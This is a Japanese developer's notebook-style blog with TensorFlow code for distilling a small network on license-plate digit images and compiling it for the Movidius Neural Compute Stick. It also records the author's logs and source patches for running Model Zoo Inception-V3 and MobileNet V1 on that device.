SeparableConv2	slim.separable_conv2d
UnitNorm	slim.unit_norm

サンプル

import numpy as np
import tensorflow as tf

from tensorflow.contrib.slim.nets import inception

slim = tf.contrib.slim

def run(name, image_size, num_classes):
    with tf.Graph().as_default():
        image = tf.placeholder("float", [1, image_size, image_size, 3], name="input")
        with slim.arg_scope(inception.inception_v1_arg_scope()):
            logits, _ = inception.inception_v1(image, num_classes, is_training=False, spatial_squeeze=False)
        probabilities = tf.nn.softmax(logits)
        init_fn = slim.assign_from_checkpoint_fn('inception_v1.ckpt', slim.get_model_variables('InceptionV1'))

        with tf.Session() as sess:
            init_fn(sess)
            saver = tf.train.Saver(tf.global_variables())
            saver.save(sess, "output/"+name)

run('inception-v1', 224, 1001)

TF-Slim を用いた蒸留

拾ってきたソースコードつなぎ合わせて無理やり動かしたらかろうじて動いたレベル

ナンバープレート画像を用いて全結合のみに蒸留

蒸留したものをMovidiusに変換

graphでoutput nodeを確認する

fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()

tensorboard --logdir logs

コンパイル

mvNCCompile -s 12 student_flozen.ckpt.meta -in=input -on=output -o graph

実行

tokunn@nanase 1:18:01 [~/Documents/distil_mnist/second_challenge] $ python3 movidius.py /home/tokunn/make_image/test/3186 2>/dev/null
Image path : /home/tokunn/make_image/test/3186/*.jpg or *.png
['extend_5_0_5934.png', 'extend_9_0_1460.png', 'extend_9_0_6437.png', 'extend_9_0_733.png', 'extend_13_0_8860.png', 'extend_5_0_1296.png', 'extend_5_0_320.png', 'extend_5_0_2227.png', 'extend_5_0_6957.png', 'extend_1_0_2447.png']
imgshape  (25, 784)
Start prediting ...
1 7 7 7 6 7 7 7 7 8 1 7 7 7 7 7 7 2 2 7 7 3 9 1 2 
Time : 0.10333132743835449 (25 images)

思ったよりすんなり動いた

ソースコード

ナンバー親子

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import loadimg


# In[2]:


#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.25
#sess = tf.Session(config=config)

config = tf.ConfigProto(
    gpu_options=tf.GPUOptions(
        visible_device_list="1", # specify GPU number
        allow_growth=False
    )
)
#sess = tf.Session(config=config)


# In[3]:


NUMBER_OF_CLASS = 10


# In[4]:


def MnistNetworkTeacher(input,keep_prob_conv,keep_prob_hidden,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
                                        
                                        
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            
            net = slim.fully_connected(net,625,scope='fc1')
            net = tf.nn.dropout(net, keep_prob_hidden)
            net = slim.fully_connected(net,NUMBER_OF_CLASS,activation_fn=None,scope='fc2')
            
            net = tf.nn.softmax(net/temperature)
            return net


# In[5]:


def MnistNetworkStudent(input,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.fully_connected],
                                          biases_initializer=tf.constant_initializer(0.0),
                                          activation_fn=tf.nn.sigmoid):
            
            net = slim.fully_connected(input,1000,scope = 'fc1')
            net = slim.fully_connected(net,
                                       NUMBER_OF_CLASS,
                                       activation_fn = None,
                                       scope = 'fc2')
            
            return net


# In[6]:


def loss(prediction,output,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        output * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
                                                  reduction_indices=[1]))      
    correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy,accuracy


# In[7]:


eps = 0.1
alpha = 0.5
temperature = 1
start_lr = 1e-4
decay = 1e-6


# In[8]:


with tf.Graph().as_default():
        
    
     

    x = tf.placeholder(tf.float32, shape=[None, 784], name='input')
    y_ = tf.placeholder(tf.float32, shape=[None, NUMBER_OF_CLASS])
    keep_prob_conv = tf.placeholder(tf.float32)
    keep_prob_hidden = tf.placeholder(tf.float32)
    x_image = tf.reshape(x, [-1,28,28,1])

    y_conv_teacher=MnistNetworkTeacher(x_image,keep_prob_conv,
                                       keep_prob_hidden,scope = 'teacher')
    y_conv = MnistNetworkStudent(x,scope = 'student')

    y_conv_student = tf.nn.softmax(y_conv/temperature)
    y_conv_student_actual = tf.nn.softmax(y_conv)

    cross_entropy_teacher, accuracy_teacher=loss(y_conv_teacher,
                                                 y_,
                                                temperature = temperature)
    student_loss1, accuracy_student = loss(y_conv_student_actual,
                                           y_,
                                          temperature = temperature)
    
    student_loss2 = tf.reduce_mean(
        - tf.reduce_sum(y_conv_teacher * tf.log(tf.clip_by_value(y_conv_student, 1e-10,1.0)), reduction_indices=1)
    )
    cross_entropy_student = student_loss1 + student_loss2
    
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'teacher' in var.name]
    var_student = [var for var in model_vars if 'student' in var.name]

    grad_teacher = tf.gradients(cross_entropy_teacher,var_teacher)
    grad_student = tf.gradients(cross_entropy_student,var_student)

    l_rate = tf.placeholder(shape=[],dtype = tf.float32)
    
    trainer = tf.train.RMSPropOptimizer(learning_rate = l_rate)
    trainer1 = tf.train.GradientDescentOptimizer(0.1)

    train_step_teacher = trainer.apply_gradients(zip(grad_teacher,var_teacher))
    train_step_student = trainer1.apply_gradients(zip(grad_student,var_student))

    sess = tf.InteractiveSession(config=config)
    sess.run(tf.global_variables_initializer())
    saver1 = tf.train.Saver(var_teacher)
    saver2 = tf.train.Saver(var_student)
    


# In[9]:


#mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)  

x_train, y_train, x_test, y_test, class_count = loadimg.loadimg(
    '/home/tokunn/make_image/',
    NUMBER_OF_CLASS
)


# In[10]:


for i in range(10000):
  #batch = mnist.train.next_batch(128)
  s = 128*i % len(x_train)
  batch = [x_train[s:s+128], y_train[s:s+128]]
  lr = start_lr * 1.0/(1.0 + i*decay)
  if i%100 ==0:
    train_accuracy = accuracy_teacher.eval(feed_dict={x:x_test,
                                                      y_: y_test,
                                                      keep_prob_conv: 1.0,
                                                      keep_prob_hidden: 1.0})
    print("step %d, training accuracy %g,"%(i, train_accuracy))
  train_step_teacher.run(feed_dict={x: batch[0],
                                    y_: batch[1],
                                    keep_prob_conv :0.8,
                                    #keep_prob_hidden:0.5})
                                    keep_prob_hidden:0.5,
                                    l_rate:lr})

saver1.save(sess,'./models/teacher1.ckpt')
print('*'*20)


 
for i in range(30000):
  #batch = mnist.train.next_batch(100)
  s = 128*i % len(x_train)
  batch = [x_train[s:s+100], y_train[s:s+100]]
  if i%100 == 0:
    train_accuracy = accuracy_student.eval(feed_dict={x:x_test,
                                                      y_: y_test,
                                                      keep_prob_conv: 1.0,
                                                      keep_prob_hidden: 1.0})
    print("step %d, training accuracy %g"%(i, train_accuracy))
  train_step_student.run(feed_dict={x: batch[0],
                                    y_: batch[1],
                                    keep_prob_conv :1.0,
                                    keep_prob_hidden:1.0})

  
saver2.save(sess,'./models/student.ckpt')  



# In[11]:


test_acc = sess.run(accuracy_student,feed_dict={x: x_test,
                                                y_: y_test,
                                                keep_prob_conv: 1.0,
                                                keep_prob_hidden: 1.0})
print("test accuracy of the student model is %g "%(test_acc))


# In[13]:


fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()


# In[ ]:

loadimg

#!/usr/bin/env python2

import os
import numpy as np
import tensorflow as tf
from keras.preprocessing.image import load_img, img_to_array
from keras.utils import np_utils
import matplotlib.pyplot as plt
import glob
from sklearn.model_selection import train_test_split


IMGSIZE = 28
IMGSIZE = 28

def loadimg_one(DIRPATH, NUM):
    x = []
    y = []

    img_list = os.listdir(DIRPATH)
    if (NUM) and (len(img_list) > NUM):
        img_list = img_list[:NUM]
    #print("[loadimg] : img_list : ", end=' ')
    #print(img_list)

    img_count = 0

    for number in img_list:
        dirpath = os.path.join(DIRPATH, number)
        dirpic_list = glob.glob(os.path.join(dirpath, '*.jpg'))
        dirpic_list += glob.glob(os.path.join(dirpath, '*.png'))
        for picture in dirpic_list:
            img = img_to_array(load_img(picture, color_mode = "grayscale", target_size=(IMGSIZE, IMGSIZE)))
            x.append(img)
            y.append(img_count)
            #print("Load {0} : {1}".format(picture, img_count))
        img_count += 1

    output_count = img_count
    x = np.asarray(x)
    x = x.astype('float32')
    x = x/255.0
    y = np.asarray(y, dtype=np.int32)
    y = np_utils.to_categorical(y, output_count)

    return x, y, output_count


def loadimg(COMMONDIR='./', NUM=None):
    print("########## loadimg ########")

    #COMMONDIR = './make_image'
    TRAINDIR = os.path.join(COMMONDIR, 'train')
    TESTDIR = os.path.join(COMMONDIR, 'test')
    x_train, y_train, class_count = loadimg_one(TRAINDIR, NUM)
    x_test,  y_test,  _  = loadimg_one(TESTDIR, NUM)
    #for i in range(0, x_test.shape[0]):
    #    plt.imshow(x_test[i])
    #    plt.show()
    x = np.concatenate((x_train, x_test))
    x = np.reshape(x, [-1, 784])
    y = np.concatenate((y_train, y_test)) 

    print("x_train, y_train, x_test, y_test, class_count")
    print("x_train shape : ", x_train.shape)

    print("########## END of loadimg ########")
    x_train, x_test, y_train, y_test = train_test_split(x, y,train_size=0.2, test_size=0.8)
    return x_train,  y_train, x_test, y_test, class_count

if __name__ == '__main__':
    loadimg()

コード変換

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import loadimg


# In[2]:


NUMBER_OF_CLASS = 10


# In[3]:


def MnistNetworkStudent(input,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.fully_connected],
                                          biases_initializer=tf.constant_initializer(0.0),
                                          activation_fn=tf.nn.sigmoid):
            
            net = slim.fully_connected(input,1000,scope = 'fc1')
            net = slim.fully_connected(net,
                                       NUMBER_OF_CLASS,
                                       activation_fn = None,
                                       scope = 'fc2')
            
            return net


# In[4]:


eps = 0.1
alpha = 0.5
temperature = 1
start_lr = 1e-4
decay = 1e-6


# In[5]:


with tf.Graph().as_default():
    
    x = tf.placeholder(tf.float32, shape=[None, 784], name='input')
    x_image = tf.reshape(x, [-1,28,28,1])

    y_conv = MnistNetworkStudent(x,scope = 'student')

    y_conv_student = tf.nn.softmax(y_conv/temperature, name='output_temp')
    y_conv_student_actual = tf.nn.softmax(y_conv, name='output')

    model_vars = tf.trainable_variables()
    var_student = [var for var in model_vars if 'student' in var.name]

    sess = tf.InteractiveSession()
    sess.run(tf.global_variables_initializer())
    sess.run(tf.local_variables_initializer())
    saver2 = tf.train.Saver(var_student)
    


# In[6]:


saver2.restore(sess, './models/student.ckpt')
saver2.save(sess,'./models/student_flozen.ckpt')  


# In[7]:


fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()

Movidius 予測

import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os

import glob

IMAGE_DIR_NAME = '/home/tokunn/make_image/'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

def predict(input):
    print("Start prediting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()

    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.resize(image, (28, 28))
        img_list.append(image)
    img_list = np.asarray(img_list) * (1.0/255.0)
    img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)
    predict(img_list.astype(np.float16))

ソースコード２

[None, 28, 28, 3]で入力

#!/usr/bin/env python
# coding: utf-8

# In[1]:


import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" 
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import loadimg


# In[2]:


NUMBER_OF_CLASS = 10


# In[3]:


def MnistNetworkTeacher(input,keep_prob_conv,keep_prob_hidden,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
                                        
                                        
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')
            net = tf.nn.dropout(net, keep_prob_conv)

            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            
            net = slim.fully_connected(net,625,scope='fc1')
            net = tf.nn.dropout(net, keep_prob_hidden)
            net = slim.fully_connected(net,NUMBER_OF_CLASS,activation_fn=None,scope='fc2')
            
            net = tf.nn.softmax(net/temperature)
            return net


# In[4]:


def MnistNetworkStudent(input,scope='Mnist',reuse = False):
    with tf.variable_scope(scope,reuse = reuse) as sc :
        with slim.arg_scope([slim.fully_connected],
                                          biases_initializer=tf.constant_initializer(0.0),
                                          activation_fn=tf.nn.sigmoid):
            
            net = slim.fully_connected(input,1000,scope = 'fc1')
            net = slim.fully_connected(net,
                                       NUMBER_OF_CLASS,
                                       activation_fn = None,
                                       scope = 'fc2')
            
            return net


# In[5]:


def loss(prediction,output,temperature = 1):
    cross_entropy = tf.reduce_mean(-tf.reduce_sum(
        output * tf.log(tf.clip_by_value(prediction,1e-10,1.0)),
                                                  reduction_indices=[1]))      
    correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    return cross_entropy,accuracy


# In[6]:


eps = 0.1
alpha = 0.5
temperature = 1
start_lr = 1e-4
decay = 1e-6


# In[7]:


with tf.Graph().as_default():
        
    
     

    x = tf.placeholder(tf.float32, shape=[None, 28,28,1], name='input')
    y_ = tf.placeholder(tf.float32, shape=[None, NUMBER_OF_CLASS])
    keep_prob_conv = tf.placeholder(tf.float32)
    keep_prob_hidden = tf.placeholder(tf.float32)
    x_line = tf.reshape(x, [-1,784])

    y_conv_teacher=MnistNetworkTeacher(x,keep_prob_conv,
                                       keep_prob_hidden,scope = 'teacher')
    y_conv = MnistNetworkStudent(x_line,scope = 'student')

    y_conv_student = tf.nn.softmax(y_conv/temperature)
    y_conv_student_actual = tf.nn.softmax(y_conv)

    cross_entropy_teacher, accuracy_teacher=loss(y_conv_teacher,
                                                 y_,
                                                temperature = temperature)
    student_loss1, accuracy_student = loss(y_conv_student_actual,
                                           y_,
                                          temperature = temperature)
    
    student_loss2 = tf.reduce_mean(
        - tf.reduce_sum(y_conv_teacher * tf.log(tf.clip_by_value(y_conv_student, 1e-10,1.0)), reduction_indices=1)
    )
    cross_entropy_student = student_loss1 + student_loss2
    
    model_vars = tf.trainable_variables()
    var_teacher = [var for var in model_vars if 'teacher' in var.name]
    var_student = [var for var in model_vars if 'student' in var.name]

    grad_teacher = tf.gradients(cross_entropy_teacher,var_teacher)
    grad_student = tf.gradients(cross_entropy_student,var_student)

    l_rate = tf.placeholder(shape=[],dtype = tf.float32)
    
    trainer = tf.train.RMSPropOptimizer(learning_rate = l_rate)
    trainer1 = tf.train.GradientDescentOptimizer(0.1)

    train_step_teacher = trainer.apply_gradients(zip(grad_teacher,var_teacher))
    train_step_student = trainer1.apply_gradients(zip(grad_student,var_student))

    sess = tf.InteractiveSession()
    sess.run(tf.global_variables_initializer())
    saver1 = tf.train.Saver(var_teacher)
    saver2 = tf.train.Saver(var_student)
    


# In[8]:


#mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)  

x_train, y_train, x_test, y_test, class_count = loadimg.loadimg(
    '/home/tokunn/make_image/',
    NUMBER_OF_CLASS
)


# In[9]:


for i in range(10000):
  #batch = mnist.train.next_batch(128)
  s = 128*i % len(x_train)
  batch = [x_train[s:s+128], y_train[s:s+128]]
  lr = start_lr * 1.0/(1.0 + i*decay)
  if i%100 ==0:
    train_accuracy = accuracy_teacher.eval(feed_dict={x:x_test,
                                                      y_: y_test,
                                                      keep_prob_conv: 1.0,
                                                      keep_prob_hidden: 1.0})
    print("step %d, training accuracy %g,"%(i, train_accuracy))
  train_step_teacher.run(feed_dict={x: batch[0],
                                    y_: batch[1],
                                    keep_prob_conv :0.8,
                                    #keep_prob_hidden:0.5})
                                    keep_prob_hidden:0.5,
                                    l_rate:lr})

saver1.save(sess,'./models/teacher1.ckpt')
print('*'*20)


 
for i in range(30000):
  #batch = mnist.train.next_batch(100)
  s = 128*i % len(x_train)
  batch = [x_train[s:s+100], y_train[s:s+100]]
  if i%100 == 0:
    train_accuracy = accuracy_student.eval(feed_dict={x:x_test,
                                                      y_: y_test,
                                                      keep_prob_conv: 1.0,
                                                      keep_prob_hidden: 1.0})
    print("step %d, training accuracy %g"%(i, train_accuracy))
  train_step_student.run(feed_dict={x: batch[0],
                                    y_: batch[1],
                                    keep_prob_conv :1.0,
                                    keep_prob_hidden:1.0})

  
saver2.save(sess,'./models/student.ckpt')  



# In[10]:


test_acc = sess.run(accuracy_student,feed_dict={x: x_test,
                                                y_: y_test,
                                                keep_prob_conv: 1.0,
                                                keep_prob_hidden: 1.0})
print("test accuracy of the student model is %g "%(test_acc))


# In[11]:


fw = tf.summary.FileWriter('logs', sess.graph)
fw.close()

2018-09-22

TensorFlow Model Zooにある学習済みモデルをMovidiusで動かす（ Inception-V3とMobileNet V1）

方法

ここに書いてある。 https://movidius.github.io/ncsdk/tf_modelzoo.html

ソースを落としてくる。

git clone https://github.com/tensorflow/tensorflow.git
git clone https://github.com/tensorflow/models.git

学習済みのチェックポイントを落としてくる。

wget -nc http://download.tensorflow.org/models/inception_v3_2016_08_28.tar.gz
tar -xvf inception_v3_2016_08_28.tar.gz

GraphDefファイルを出力。

python3 ../models/research/slim/export_inference_graph.py \
        --alsologtostderr \
        --model_name=inception_v3 \
        --batch_size=1 \
        --dataset_name=imagenet \
        --image_size=299 \
        --output_file=inception_v3.pb

グラフのフリーズ。

python3 ../tensorflow/tensorflow/python/tools/freeze_graph.py \
        --input_graph=inception_v3.pb \
        --input_binary=true \
        --input_checkpoint=inception_v3.ckpt \
        --output_graph=inception_v3_frozen.pb \
        --output_node_name=InceptionV3/Predictions/Reshape_1

コンパイル。

mvNCCompile -s 12 inception_v3_frozen.pb -in=input -on=InceptionV3/Predictions/Reshape_1

やってみる

フリーズの工程にて

tokunn@tokunn-VirtualBox 16:13:16 [~/Documents/MovidiusTensorflow/use_modelzoo/inceptionV3] $ python3 ~/Documents/source/tensorflow/tensorflow/python/tools/freeze_graph.py \
>               --input_graph=inception_v3.pb \
                --input_binary=true \
                --input_checkpoint=inception_v3.ckpt \
                --output_graph=inception_v3_frozen.pb \
                --output_node_name=InceptionV3/Predictions/Reshape_1
Traceback (most recent call last):
  File "/home/tokunn/Documents/source/tensorflow/tensorflow/python/tools/freeze_graph.py", line 58, in <module>
    from tensorflow.python.training import checkpoint_management
ImportError: cannot import name 'checkpoint_management'

動かない。

バグらしい。 https://github.com/tensorflow/tensorflow/issues/22019

いつも通りパッチを当てる。

58d57
< from tensorflow.python.training import checkpoint_management
59a59
> import tensorflow as tf
127c127
<       not checkpoint_management.checkpoint_exists(input_checkpoint)):
---
>       not tf.train.checkpoint_exists(input_checkpoint)):

無事にfrozenなのが出力された。

mvNCCheckで

tokunn@nanase 7:41:25 [~] $ mvNCCheck -s 12 inception_v3_frozen.pb -in=input -on=InceptionV3/Predictions/Reshape_1 2>/dev/null
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Result:  (1, 1, 1001)
1) 22 0.1576
2) 93 0.1223
3) 95 0.0448
4) 23 0.03558
5) 24 0.02771
Expected:  (1, 1001)
1) 22 0.1599765
2) 93 0.12189513
3) 95 0.04604088
4) 23 0.03503471
5) 24 0.02783106
------------------------------------------------------------
 Obtained values 
------------------------------------------------------------
 Obtained Min Pixel Accuracy: 1.4900462701916695% (max allowed=2%), Pass
 Obtained Average Pixel Accuracy: 0.01522512175142765% (max allowed=1%), Pass
 Obtained Percentage of wrong values: 0.0% (max allowed=0%), Pass
 Obtained Pixel-wise L2 error: 0.06495287965302322% (max allowed=1%), Pass
 Obtained Global Sum Difference: 0.02438097447156906
------------------------------------------------------------

問題なく動作した。

ほかのネットワークもやってみる (Mobilent V1)

ネットワークのリスト https://github.com/tensorflow/models/tree/master/research/slim/nets

重みのリスト https://github.com/tensorflow/models/tree/master/research/slim

モデルの準備

ネットワーク名はmobilenet_v1

重みは http://download.tensorflow.org/models/mobilenet_v1_2018_02_22/mobilenet_v1_0.5_160.tgz

なんか重みをダウンロードしたらmobilenet_v1_0.5_160_frozen.pbも入ってた。
あとはコンパイルするだけ。

インプット/アウトプットノードの捜索

.pbファイルからノードを探す。

https://ncsforum.movidius.com/discussion/683/tensorflow-conversion-toolkit-error-output-node-not-found

コードは添付。

結果

tokunn@tokunn-VirtualBox 17:02:17 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1/getnodename_pb.py] $ python3 getnodename_pb.py | grep input
input , Placeholder

tokunn@tokunn-VirtualBox 17:03:10 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1/getnodename_pb.py] $ python3 getnodename_pb.py | grep Predictions
MobilenetV1/Predictions/Reshape_1 , Reshape

おそらくこのinputとMobilenetV1/Predictions/Reshape_1であろう。

コンパイル

ここまでは素直に来たのでコンパイル。

mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1

やっぱり終わらないエラーとの闘い。

tokunn@tokunn-VirtualBox 17:10:23 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1] $ mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016

/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py:923: DeprecationWarning: builtin type EagerTensor has no __module__ attribute
  EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/util/tf_inspect.py:75: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  return _inspect.getargspec(target)
1
Traceback (most recent call last):
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1278, in _do_call
    return fn(*args)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1263, in _run_fn
    options, feed_dict, fetch_list, target_list, run_metadata)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1350, in _call_tf_sessionrun
    run_metadata)
tensorflow.python.framework.errors_impl.InvalidArgumentError: You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3]
     [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]]

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/bin/mvNCCompile", line 118, in <module>
    create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights)
  File "/usr/local/bin/mvNCCompile", line 104, in create_graph
    net = parse_tensor(args, myriad_config)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 1061, in parse_tensor
    desired_shape = node.inputs[1].eval()
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 680, in eval
    return _eval_using_default_session(self, feed_dict, self.graph, session)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 4951, in _eval_using_default_session
    return session.run(tensors, feed_dict)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 877, in run
    run_metadata_ptr)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1100, in _run
    feed_dict_tensor, options, run_metadata)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1272, in _do_run
    run_metadata)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/client/session.py", line 1291, in _do_call
    raise type(e)(node_def, op, message)
tensorflow.python.framework.errors_impl.InvalidArgumentError: You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3]
     [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]]

Caused by op 'input', defined at:
  File "/usr/local/bin/mvNCCompile", line 118, in <module>
    create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights)
  File "/usr/local/bin/mvNCCompile", line 104, in create_graph
    net = parse_tensor(args, myriad_config)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 211, in parse_tensor
    tf.import_graph_def(graph_def, name="")
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/util/deprecation.py", line 454, in new_func
    return func(*args, **kwargs)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/importer.py", line 442, in import_graph_def
    _ProcessNewOps(graph)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/importer.py", line 234, in _ProcessNewOps
    for new_op in graph._add_new_tf_operations(compute_devices=False):  # pylint: disable=protected-access
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3289, in _add_new_tf_operations
    for c_op in c_api_util.new_tf_operations(self)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3289, in <listcomp>
    for c_op in c_api_util.new_tf_operations(self)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 3180, in _create_op_from_tf_operation
    ret = Operation(c_op, self)
  File "/home/tokunn/.local/lib/python3.5/site-packages/tensorflow/python/framework/ops.py", line 1717, in __init__
    self._traceback = tf_stack.extract_stack()

InvalidArgumentError (see above for traceback): You must feed a value for placeholder tensor 'input' with dtype float and shape [?,160,160,3]
     [[Node: input = Placeholder[dtype=DT_FLOAT, shape=[?,160,160,3], _device="/job:localhost/replica:0/task:0/device:CPU:0"]()]]

どうやら入力のプレースホルダに何も与えられていない模様？
それは私のせいではないのではないだろうか？

https://ncsforum.movidius.com/discussion/1010/why-is-there-an-invalidargumenterror-you-must-feed-a-value-for-placeholder-tensor-dense-1-input

I just got exactly the same problem. Hope someone can help

かなしい

https://github.com/ardamavi/Intel-Movidius-NCS-Keras/issues/2

The project is still in construction. Stay tuned!
This project is open source. If you share your patch, let's try to fix it together.

かなしい

I have come across similar problem, solved by modifying ncsdk source. In /usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line 1059, add a feed_dict to eval:

いつも通り/usr/local/bin/ncsdk/Controllers/TensorFlowParser.pyが悪さをしている説。

1061c1061
<                 desired_shape = node.inputs[1].eval()
---
>                 desired_shape = node.inputs[1].eval(feed_dict={inputnode + ':0' : input_data})

今日も元気にパッチを当ててみる。

